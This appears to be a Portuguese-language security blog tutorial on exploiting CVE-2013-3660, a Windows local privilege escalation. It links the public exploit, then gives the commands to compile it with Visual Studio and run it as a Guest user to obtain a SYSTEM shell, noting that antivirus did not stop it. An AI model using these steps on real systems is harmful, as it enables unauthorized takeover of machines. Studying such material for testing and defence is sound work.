O CVE-2013-3660 detalha uma vulnerabilidade que afeta as versões mais utilizadas do Windows tais como: XP, Vista, 7, 8, 2003, 2008 e 2012.

Exploit: www.exploit-db.com/exploits/25912

CVE: cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3660

01 - Passo

Realize o download do exploit e salve como: CVE-2013-3660.c

02 - Passo

Utilize o Microsoft Visual Studio 10.0 para compilar o exploit CVE-2013-3660.c

Como Administrador acesse o diretório: C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\bin e execute o arquivo vcvars32.bat.

  Windows
cd "C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\bin"

vcvars32.bat

03 - Passo

Copie o exploit CVE-2013-3660.c para o diretório binário do Visual Studio.

  Windows
copy "C:\Downloads\CVE-2013-3660.c C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\bin"

04 - Passo

Para compilar o exploit execute o comando:

  Windows
cl CVE-2013-3660.c

Exploit compilado com sucesso: CVE-2013-3660.exe

05 - Passo

A vulnerabilidade pode ser explorada nos sistemas:

  • Microsoft Windows XP
  • Microsoft Windows Vista
  • Microsoft Windows 7
  • Microsoft Windows 8
  • Microsoft Windows Server 2003
  • Microsoft Windows Server 2008
  • Microsoft Windows Server 2012

Para este artigo estou utilizando o sistema Microsoft Windows Server 2008 R2 64 bits, logue com um usuário comum o Guest por exemplo e execute o exploit CVE-2013-3660.exe no C:\.

  Windows
cd \

CVE-2013-3660.exe cmd

Vulnerabilidade explorada com sucesso, uma nova janela do Command Prompt é inciada com perfil de SYSTEM, basta digitar o comando whoami para confirmar.

Vale destacar que o Anti-Vírus está ativo e atualizado.

Como sabem com privilégios de SYSTEM é possível fazer qualquer atividade no sistema operacional.


👍 Se este artigo te ajudou compartilhe!



  Autor

Marcos Henrique

 São Paulo/SP



  CVE Windows

© 2024 - 100SECURITY

Contato